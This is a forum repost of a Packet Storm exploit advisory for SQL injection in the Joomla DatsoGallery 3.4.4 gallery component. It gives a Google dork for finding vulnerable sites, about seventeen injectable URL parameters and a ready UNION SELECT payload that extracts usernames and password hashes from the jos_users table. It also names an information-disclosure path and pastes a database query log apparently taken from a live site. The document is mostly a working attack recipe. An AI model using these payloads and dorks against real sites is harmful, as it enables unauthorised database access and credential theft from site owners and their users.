Joomla DatsoGallery 3.4.4 SQL Injection

#265
Topic created · 1 Posts · 4 Views
  • Joomla DatsoGallery component version 3.4.4 suffers from remote SQL injection vulnerabilities.
    MD5 | 6c85bd5ea2ffce23eec931b1e1410007
    Download

    ####################################################################  
    # Exploit Title : Joomla DatsoGallery Components 3.4.4 SQL Injection  
    # Author [ Discovered By ] : KingSkrupellos  
    # Team : Cyberizm Digital Security Army  
    # Date : 14/02/2019  
    # Vendor Homepage : datso.fr  
    # Software Download Link : datso.fr/products.html  
    # Software Information Link : extensions.joomla.org/extension/datsogallery/  
    # Software Affected Versions : 3.4.4 and previous versions  
    1.3.6.1 - 1.3.8 ~ 1.5 ~ 1.14 ~ 1.6 ~ 1.6.2 - 1.7.1 - 1.20 - 1.8.8 - 1.8.4 - 1.8.9 - 1.9.5   
    # Software Prices : 20$ - 60$ - 120$ - 240$  
    # Software Technical Requirements :  
    DatsoGallery Multilingual is a native Joomla! and Mambo 4.6.x gallery component  
    DatsoGallery Multilingual is a native Joomla! and Mambo [ No Version ] gallery component  
    # Tested On : Windows and Linux  
    # Category : WebApps  
    # Exploit Risk : High  
    # Google Dorks : inurl:''/index.php?option=com_datsogallery''  
    # Vulnerability Type : CWE-89 [ Improper Neutralization of   
    Special Elements used in an SQL Command ('SQL Injection') ]  
    # Old Similar CVE =>  CVE-2008-1540  => nvd.nist.gov/vuln/detail/CVE-2008-1540   
    # Old Similar CVE =>  CVE-2008-5208 => cvedetails.com/cve/CVE-2008-5208/  
    # PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
    # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
    # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
    ####################################################################  
    # Description about Software :  
    ***************************  
    DatsoGallery component help you quickly and effortlessly create a multi-functional   
    photo gallery. The intuitive interface makes it easy to manage the component and its content.   
    A lot of settings allows you to organize the gallery, meet within acceptable to your requirements.  
    It's a powerful image gallery component, which help you quickly and effortlessly   
    create a beautiful and multi-functional photo gallery on your web site.  
    ####################################################################  
    # Impact :  
    ***********  
    Joomla DatsoGallery 3.4.4 and other versions -   
    component for Joomla is prone to an SQL-injection vulnerability because it   
    fails to sufficiently sanitize user-supplied data before using it in an SQL query.   
    Exploiting this issue could allow an attacker to compromise the application,   
    access or modify data, or exploit latent vulnerabilities in the underlying database.  
    A remote attacker can send a specially crafted request to the vulnerable application   
    and execute arbitrary SQL commands in application`s database.  
    Further exploitation of this vulnerability may result in unauthorized data manipulation.  
    An attacker can exploit this issue using a browser.  
    ####################################################################  
    # SQL Injection Exploit :  
    **********************  
    /index.php?option=com_datsogallery&Itemid=[SQL Injection]  
    /index.php?option=com_datsogallery&func=detail&id=[SQL Injection]  
    /index.php?option=com_datsogallery&func=wmark&oid=[SQL Injection]  
    /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]  
    /index.php?option=com_datsogallery&task=image&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]  
    /index.php?option=com_datsogallery&func=detail&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=&Itemid=[SQL Injection]  
    /index.php?option=com_datsogallery&task=sbox&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw  
    /index.php?option=com_datsogallery&func=slideshow&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw  
    /index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection]  
    /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]  
    /index.php?option=com_datsogallery&func=download&id=[ID-NUMBER]&Itemid=[SQL Injection]  
    /index.php?option=com_datsogallery&task=downloads&Itemid=[SQL Injection]  
    /index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection]  
    /index.php?option=com_datsogallery&func=lastadded&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]  
    /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]  
    /index.php?option=com_datsogallery&Itemid=[SQL Injection]&func=special&sorting=lastcomment  
    /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&catid=[ID-NUMBER]&id=[SQL Injection]&lang=hu  
    # Information Disclosure Exploit :  
    *****************************  
    /administrator/components/com_datsogallery/datsogallery.xml  
    # Example SQL Injection Payload :  
    *******************************  
    'union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*  
    ####################################################################  
    # Example SQL Database Errors :  
    ****************************  
    30 queries executed  
    1  
    SET sql_mode = 'MYSQL40'  
    2  
    SELECT folder, element, published, params  
    FROM jos_mambots  
    WHERE published >= 1  
    AND access <= 0  
    AND folder = 'system'  
    ORDER BY ordering  
    3  
    SELECT template  
    FROM jos_templates_menu  
    WHERE client_id = 0  
    AND ( menuid = 0  OR menuid = 99999999 )  
    ORDER BY menuid DESC  
    LIMIT 1  
    4  
    DELETE FROM jos_session  
    WHERE (  
    ( time < '1550015982' )  
    AND guest = 0  
    AND gid > 0  
    ) OR (  
    ( time < '1550015982' )  
    AND guest = 1  
    AND userid = 0  
    )  
    5  
    SELECT *  
    FROM jos_menu  
    WHERE published = 1 AND  
    link LIKE 'index.php?option=com\_datsogallery%'  
    6  
    select a.*, cc.name as category  from jos_datsogallery as a, jos_datsogallery_catg as cc    
    where a.catid=cc.cid and a.id=2219  and cc.access<='0'  
    7  
    select * from jos_datsogallery_catg where cid=141 and published=1 and access<='0'  
    8  
    select * from jos_datsogallery_catg where cid=3 and published=1 and access<='0'  
    9  
    select c.access  from jos_datsogallery_catg as c  left join jos_datsogallery as a on a.catid=c.cid  where a.id= '2219'  
    10  
    select a.id,  a.catid,  a.imgtitle,  a.imgauthor,  a.imgtext,  a.imgdate,  a.imgcounter,  a.imgvotes,  a.imgvotesum,  a.published,    
    a.imgoriginalname,  a.imgfilename,  a.imgthumbname,  a.owner, u.id  FROM jos_datsogallery as a  left join jos_users   
    as u on u.username=a.owner  where a.id='2219'  and a.approved=1  
    11  
    select a.id,  a.catid,  a.imgtitle,  a.imgauthor,  a.imgtext,  a.imgdate,  a.imgcounter,  a.imgvotes,  a.imgvotesum,   
    a.published,  a.imgoriginalname,  a.imgfilename,  a.imgthumbname,  a.owner, u.id  FROM jos_datsogallery as a    
    left join jos_users as u on u.username=a.owner  where a.id='2219'  and a.approved=1  
    12  
    SELECT id, imgfilename FROM jos_datsogallery WHERE catid=141 ORDER BY id DESC  
    13  
    UPDATE jos_datsogallery SET imgcounter='286' WHERE id=2219  
    14  
    SELECT a.*  
    FROM jos_components AS a  
    WHERE ( a.admin_menu_link = 'option=com_syndicate' OR a.admin_menu_link =  
    'option=com_syndicate&hidemainmenu=1' )  
    AND a.option = 'com_syndicate'  
    15  
    SELECT id, title, module, position, content, showtitle, params  
    FROM jos_modules AS m  
    INNER JOIN jos_modules_menu AS mm ON mm.moduleid = m.id  
    WHERE m.published = 1  
    AND m.access <= 0  
    AND m.client_id != 1  
    AND ( mm.menuid = 0  )  
    ORDER BY ordering  
    16  
    SELECT m.*  
    FROM jos_menu AS m  
    WHERE menutype = 'topmenu'  
    AND published = 1  
    AND access <= 0  
    AND parent = 0  
    ORDER BY ordering  
    17  
    SELECT m.*  
    FROM jos_menu AS m  
    WHERE menutype = 'mainmenu'  
    AND published = 1  
    AND access <= 0  
    ORDER BY parent, ordering  
    18  
    SELECT COUNT( id )  
    FROM jos_menu   
    WHERE type = 'content_item_link'  
    AND published = 1  
    19  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=1'  
    20  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=13'  
    21  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=12'  
    22  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=14'  
    23  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=15'  
    24  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=16'  
    25  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=17'  
    26  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=18'  
    27  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=23'  
    28  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=38'  
    29  
    SELECT id  
    FROM jos_menu  
    WHERE type = 'content_item_link'  
    AND published = 1  
    AND link = 'index.php?option=com_content&task=view&id=46'  
    30  
    SELECT id, name, link, parent, type, menutype, access  
    FROM jos_menu  
    WHERE published = 1  
    AND access <= 0  
    ORDER BY menutype, parent, ordering  
    Strict Standards: Non-static method JSite::getMenu() should not be called   
    statically in /home/abusheik/public_html/ds/components  
    /com_datsogallery/datsogallery.php on line 20  
    ####################################################################  
    # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
    ####################################################################  
    

    Source: packetstormsecurity.com

Log in to reply